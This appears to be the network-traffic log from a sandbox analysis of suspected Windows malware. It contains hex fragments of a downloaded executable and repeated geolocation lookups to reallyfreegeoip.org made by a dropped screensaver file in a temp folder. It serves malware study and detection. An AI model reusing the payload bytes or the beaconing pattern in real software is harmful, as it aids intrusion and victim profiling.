2024-05-01 13:17:09 UTC | 781 | IN | Data Raw: 33 31 65 61 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 0b 33 dd 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 0f 00 00 08 00 00 00 00 00 00 1e f8 0f 00 00 20 00 00 00 00 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
Data Ascii: 31eaMZ@!L!This program cannot be run in DOS mode.$PEL30 @ @@
2024-05-01 13:17:09 UTC | 1369 | IN | Data Raw: 00 c0 00 40 00 f0 00 00 00 cc 01 30 ff 88 01 18 ff 59 06 00 00 bf 08 00 00 7e 11 00 00 fd 22 00 00 20 00 09 00 0a 00 0d 00 04 08 00 00 04 04 00 00 07 04 00 00 09 04 00 00 0a 04 00 00 0c 04 00 00 11 04 00 00 00 00 00 00 2e 00 5f 21 00 5f 26 00 5f 2c 00 5f 2e 00 5f 3f 00 5f 5e 00 5f 7c 00 5f 7c 7c 00 5f 53 00 2b 00 41 00 41 41 00 41 44 56 00 41 45 00 41 45 58 00 41 48 00 41 49 ff ff 00 41 4e ff 00 41 4f 00 41 4f 45 00 41 4f 58 ff ff 00 41 50 49 00 41 53 50 00 41 54 52 00 41 55 ff ff 00 41 58 00 41 58 52 00 42 00 42 42 00 42 48 00 42 49 4d 00 42 56 41 00 42 56 44 00 43 00 43 43 ff ff 00 43 43 32 00 43 43 4b 00 43 45 4e 00 43 48 ff ff 00 43 48 32 00 43 4a 00 43 54 00 43 56 44 00 44 00 44 45 4e 00 44 48 00 44 49 4d 00 44 52 00 44 58 00 44 58 52 00 44 5a ff ff
Data Ascii: @0Y~" ._!_&_,_._?_^_|_||_S+AAAADVAEAEXAHAIANAOAOEAOXAPIASPATRAUAXAXRBBBBHBIMBVABVDCCCCC2CCKCENCHCH2CJCTCVDDDENDHDIMDRDXDXRDZ
2024-05-01 13:17:09 UTC | 1369 | IN | Data Raw: 30 30 00 33 31 30 35 00 33 31 30 36 00 33 31 30 37 00 33 31 30 38 00 33 31 30 39 00 33 31 30 41 00 33 31 30 42 00 33 31 30 43 00 33 31 30 44 00 33 31 30 45 00 33 31 30 46 00 33 31 31 30 00 33 31 31 31 00 33 31 31 32 00 33 31 31 33 00 33 31 31 34 00 33 31 31 35 00 33 31 31 36 00 33 31 31 37 00 33 31 31 38 00 33 31 31 39 00 33 31 31 41 00 33 31 31 42 00 33 31 31 43 00 33 31 31 44 00 33 31 31 45 00 33 31 31 46 00 33 31 32 30 00 33 31 32 31 00 33 31 32 32 00 33 31 32 33 00 33 31 32 34 00 33 31 32 35 00 33 31 32 36 00 33 31 32 37 00 33 31 32 38 00 33 31 32 39 00 00 00 00 00 21 00 26 00 2a 00 2b 00 2c 00 2d 00 2e 00 3f 00 5f 00 c7 02 c9 02 ca 02 cb 02 d9 02 00 30 05 31 06 31 07 31 08 31 09 31 0a 31 0b 31 0c 31 0d 31 0e 31 0f 31 10 31 11 31 12 31 13 31 14 31 15
Data Ascii: 0031053106310731083109310A310B310C310D310E310F3110311131123113311431153116311731183119311A311B311C311D311E311F3120312131223123312431253126312731283129!&*+,-.?_01111111111111111
2024-05-01 13:17:09 UTC | 1369 | IN | Data Raw: 00 33 30 43 42 00 33 30 43 43 00 33 30 43 44 00 33 30 43 45 00 33 30 43 46 00 33 30 44 30 00 33 30 44 31 00 33 30 44 32 00 33 30 44 33 00 33 30 44 34 00 33 30 44 35 00 33 30 44 36 00 33 30 44 37 00 33 30 44 38 00 33 30 44 39 00 33 30 44 41 00 33 30 44 42 00 33 30 44 43 00 33 30 44 44 00 33 30 44 45 00 33 30 44 46 00 33 30 45 30 00 33 30 45 31 00 33 30 45 32 00 33 30 45 33 00 33 30 45 34 00 33 30 45 35 00 33 30 45 36 00 33 30 45 37 00 33 30 45 38 00 33 30 45 39 00 33 30 45 41 00 33 30 45 42 00 33 30 45 43 00 33 30 45 44 00 33 30 45 45 00 33 30 45 46 00 33 30 46 30 00 33 30 46 31 00 33 30 46 32 00 33 30 46 33 00 33 30 46 34 00 33 30 46 35 00 33 30 46 36 00 33 30 46 37 00 33 30 46 38 00 33 30 46 39 00 33 30 46 41 00 33 30 46 42 00 33 30 46 43 00 33 30 46 44
Data Ascii: 30CB30CC30CD30CE30CF30D030D130D230D330D430D530D630D730D830D930DA30DB30DC30DD30DE30DF30E030E130E230E330E430E530E630E730E830E930EA30EB30EC30ED30EE30EF30F030F130F230F330F430F530F630F730F830F930FA30FB30FC30FD
2024-05-01 13:17:09 UTC | 1369 | IN | Data Raw: 4e 41 4e 00 4e 41 4e 47 00 4e 41 4f 00 4e 45 00 4e 45 49 00 4e 45 4e 00 4e 45 4e 47 00 4e 49 00 4e 49 41 4e 00 4e 49 41 4e 47 00 4e 49 41 4f 00 4e 49 45 00 4e 49 4e 00 4e 49 4e 47 00 4e 49 55 00 4e 4f 4e 47 00 4e 4f 55 00 4e 55 00 4e 55 41 4e 00 4e 55 45 00 4e 55 4f 00 4e 56 00 4f 00 4f 55 00 50 41 00 50 41 49 00 50 41 4e 00 50 41 4e 47 00 50 41 4f 00 50 45 49 00 50 45 4e 00 50 45 4e 47 00 50 49 00 50 49 41 4e 00 50 49 41 4f 00 50 49 45 00 50 49 4e 00 50 49 4e 47 00 50 4f 00 50 4f 55 00 50 55 00 51 49 00 51 49 41 00 51 49 41 4e 00 51 49 41 4e 47 00 51 49 41 4f 00 51 49 45 00 51 49 4e 00 51 49 4e 47 00 51 49 4f 4e 47 00 51 49 55 00 51 55 00 51 55 41 4e 00 51 55 45 00 51 55 4e 00 52 41 4e 00 52 41 4e 47 00 52 41 4f 00 52 45 00 52 45 4e 00 52 45 4e 47 00 52
Data Ascii: NANNANGNAONENEINENNENGNINIANNIANGNIAONIENINNINGNIUNONGNOUNUNUANNUENUONVOOUPAPAIPANPANGPAOPEIPENPENGPIPIANPIAOPIEPINPINGPOPOUPUQIQIAQIANQIANGQIAOQIEQINQINGQIONGQIUQUQUANQUEQUNRANRANGRAORERENRENGR
2024-05-01 13:17:09 UTC | 1369 | IN | Data Raw: 00 ff 00 00 01 01 01 02 01 03 01 04 01 05 01 06 01 07 01 08 01 09 01 0a 01 0b 01 0c 01 0d 01 0e 01 0f 01 10 01 11 01 12 01 13 01 14 01 15 01 16 01 17 01 18 01 19 01 1a 01 1b 01 1c 01 1d 01 1e 01 1f 01 20 01 21 01 22 01 23 01 24 01 25 01 26 01 27 01 28 01 29 01 2a 01 2b 01 2c 01 2d 01 2e 01 2f 01 30 01 31 01 32 01 33 01 34 01 35 01 36 01 37 01 38 01 39 01 3a 01 3b 01 3c 01 3d 01 3e 01 3f 01 40 01 41 01 42 01 43 01 44 01 45 01 46 01 47 01 48 01 49 01 4a 01 4b 01 4c 01 4d 01 4e 01 4f 01 50 01 51 01 52 01 53 01 54 01 55 01 56 01 57 01 58 01 59 01 5a 01 5b 01 5c 01 5d 01 5e 01 5f 01 60 01 61 01 62 01 63 01 64 01 65 01 66 01 67 01 68 01 69 01 6a 01 6b 01 6c 01 6d 01 6e 01 6f 01 70 01 71 01 72 01 73 01 74 01 75 01 76 01 77 01 78 01 79 01 7a 01 7b 01 7c 01 7d 01
Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}
2024-05-01 13:17:09 UTC | 1369 | IN | Data Raw: 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00
                                                    Data Ascii:
                                                    2024-05-01 13:17:09 UTC1369INData Raw: ff ff ff c8 ff ff ff d0 ff ff ff d8 ff ff ff e0 ff ff ff e8 ff ff ff f0 ff ff ff f8 ff ff ff 00 00 00 00 7c 7d 00 00 7c 79 00 00 7c 75 00 00 7c 71 00 00 7c 6d 00 00 7c 69 00 00 7c 65 00 00 7c 61 00 00 7c 5d 00 00 7c 59 00 00 7c 55 00 00 7c 51 00 00 7c 4d 00 00 7c 49 00 00 7c 45 00 00 7c 41 00 00 7c 3e 00 00 7c 3c 00 00 7c 3a 00 00 7c 38 00 00 7c 36 00 00 7c 34 00 00 7c 32 00 00 7c 30 00 00 7c 2e 00 00 7c 2c 00 00 7c 2a 00 00 7c 28 00 00 7c 26 00 00 7c 24 00 00 7c 22 00 00 7c 20 00 00 fc 1e 00 00 fc 1d 00 00 fc 1c 00 00 fc 1b 00 00 fc 1a 00 00 fc 19 00 00 fc 18 00 00 fc 17 00 00 fc 16 00 00 fc 15 00 00 fc 14 00 00 fc 13 00 00 fc 12 00 00 fc 11 00 00 fc 10 00 00 fc 0f 00 00 3c 0f 00 00 bc 0e 00 00 3c 0e 00 00 bc 0d 00 00 3c 0d 00 00 bc 0c 00 00 3c 0c 00 00
                                                    Data Ascii: |}|y|u|q|m|i|e|a|]|Y|U|Q|M|I|E|A|>|<|:|8|6|4|2|0|.|,|*|(|&|$|"| <<<<
                                                    2024-05-01 13:17:09 UTC1369INData Raw: 00 00 b8 01 00 00 a8 01 00 00 58 00 00 00 48 00 00 00 78 00 00 00 68 00 00 00 18 00 00 00 08 00 00 00 38 00 00 00 28 00 00 00 d8 00 00 00 c8 00 00 00 f8 00 00 00 e8 00 00 00 98 00 00 00 88 00 00 00 b8 00 00 00 a8 00 00 00 60 05 00 00 20 05 00 00 e0 05 00 00 a0 05 00 00 60 04 00 00 20 04 00 00 e0 04 00 00 a0 04 00 00 60 07 00 00 20 07 00 00 e0 07 00 00 a0 07 00 00 60 06 00 00 20 06 00 00 e0 06 00 00 a0 06 00 00 b0 02 00 00 90 02 00 00 f0 02 00 00 d0 02 00 00 30 02 00 00 10 02 00 00 70 02 00 00 50 02 00 00 b0 03 00 00 90 03 00 00 f0 03 00 00 d0 03 00 00 30 03 00 00 10 03 00 00 70 03 00 00 50 03 00 00 02 00 00 00 03 00 00 00 05 00 00 00 07 00 00 00 0b 00 00 00 0d 00 00 00 11 00 00 00 13 00 00 00 17 00 00 00 1d 00 00 00 1f 00 00 00 25 00 00 00 00 00 00 00 04
                                                    Data Ascii: XHxh8(` ` ` ` 0pP0pP%
                                                    2024-05-01 13:17:09 UTC1053INData Raw: 2c 1c 02 7b 94 00 00 04 6f 98 00 00 06 2d 0f 02 7b 94 00 00 04 6f 9a 00 00 06 14 fe 01 2a 16 2a ae 02 7b 94 00 00 04 2c 21 02 7b 94 00 00 04 6f 9a 00 00 06 2d 12 02 7b 94 00 00 04 6f 98 00 00 06 14 fe 01 16 fe 01 2a 17 2a 16 2a 6e 02 7b 94 00 00 04 2d 02 14 2a 02 7b 94 00 00 04 28 81 00 00 06 6f a0 00 00 06 2a ea 02 6f 9c 00 00 06 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 98 00 00 06 33 11 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 9a 00 00 06 2a 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 98 00 00 06 2a 5e 02 03 6f 98 00 00 06 33 07 03 6f 9a 00 00 06 2a 03 6f 98 00 00 06 2a 46 02 2c 0c 02 6f 9e 00 00 06 2d 02 16 2a 17 2a 16 2a 3a 02 2c 0a 02 03 17 fe 01 6f 9f 00 00 06 2a 52 2b 08 02 6f 98 00 00 06 10 00 02 6f 98 00 00 06 2d f0 02 2a 52 2b 08 03 6f 9c 00 00 06 10 01 03 6f 9c
                                                    Data Ascii: ,{o-{o**{,!{o-{o***n{-*{(o*oooo3ooo*ooo*^o3o*o*F,o-***:,o*R+oo-*R+oo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49715 | 23.56.12.145 | 443 | 7348 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:21 UTC | 475 | OUT | GET /onboarding/smskillreader.txt HTTP/1.1
                                                    Host: armmf.adobe.com
                                                    Connection: keep-alive
                                                    Accept-Language: en-US,en;q=0.9
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    If-None-Match: "78-5faa31cce96da"
                                                    If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
2024-05-01 13:17:22 UTC | 198 | IN | HTTP/1.1 304 Not Modified
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                    ETag: "78-5faa31cce96da"
                                                    Date: Wed, 01 May 2024 13:17:21 GMT
                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49724 | 172.67.177.134 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:27 UTC | 85 | OUT | GET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
2024-05-01 13:17:27 UTC | 699 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:27 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:27 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ab4dzDZD7ACXuFM0rTRZ2WmquA6%2B3gUX%2Bc%2BOToBISiZ2VxRAvaBrPLG7hJvnL%2FGDN3MnM5gkP%2BMZ9p9qIhhbOzToW9IqUuAAB6CWtS0TazCOgVDJenEPtoWk2rWxIb5XxtAG5OIv"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d4598200814-IAD
                                                    alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:27 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49727 | 172.67.177.134 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:28 UTC | 61 | OUT | GET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
2024-05-01 13:17:28 UTC | 705 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:28 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:28 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=889RWY73f29sE5zUYkQ%2FvuO59MG0MHtZePHpiLN%2BWPnqi4xZdcw%2Bk4nN%2FBgYBAj8pqi93InaDtUudtwemCdi3Lfc4ikbcSJz%2B9ltRw0dUarHaI7e%2FxsvazP3VfnP4qm%2FgecYh5O%2B"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d4b89c93b68-IAD
                                                    alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:28 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49729 | 172.67.177.134 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:30 UTC | 85 | OUT | GET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
2024-05-01 13:17:30 UTC | 691 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:30 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:30 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HSbU01gPN9fVMPzMGcmMSglZBvNgbww9J31iBoY1i9EjoRnPQ7sA9PTjrL80Ac8hzZ3pZQAH6qBVlSQzOmxCikOt83EBNrSnVpUlcXBDm7zzqa0oX7jU%2BnAn1BOcSGeSVHBszOEU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d595ac35848-IAD
                                                    alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:30 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49731 | 172.67.177.134 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:31 UTC | 61 | OUT | GET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
2024-05-01 13:17:31 UTC | 700 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:31 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 4
                                                    Last-Modified: Wed, 01 May 2024 13:17:27 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bw9%2BwJZ8NI5qcNLvkFbkyTo3teP26L708nsWJyr%2BTBlkGEHsImkhdaXS1k7zh5kMbKXdsYtEhp6CnF3NygpPnnCZ7LT1GDKRtl7hiNK94You6SWju2fugxFiFQFLKuGepYnSiRzx"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d5f7a353932-IAD
                                                    alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:31 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49733 | 172.67.177.134 | 443 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:31 UTC | 61 | OUT | GET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
2024-05-01 13:17:32 UTC | 708 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:32 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 4
                                                    Last-Modified: Wed, 01 May 2024 13:17:28 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPfowrYSP8EhiG0OB07MkL3J8fDbcgH5T%2BEZx7nrCUpMJBQDn9XS0eVY%2Bzc6ubhYGB31knI5qJVj1vKPb60LEYodvyns%2FxQMTQYf5U%2BQZ7TM8Cp4VsvZ%2Bdny4WN93Qnn%2FZo0mO8P"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d637dc4054a-IAD
                                                    alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:32 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


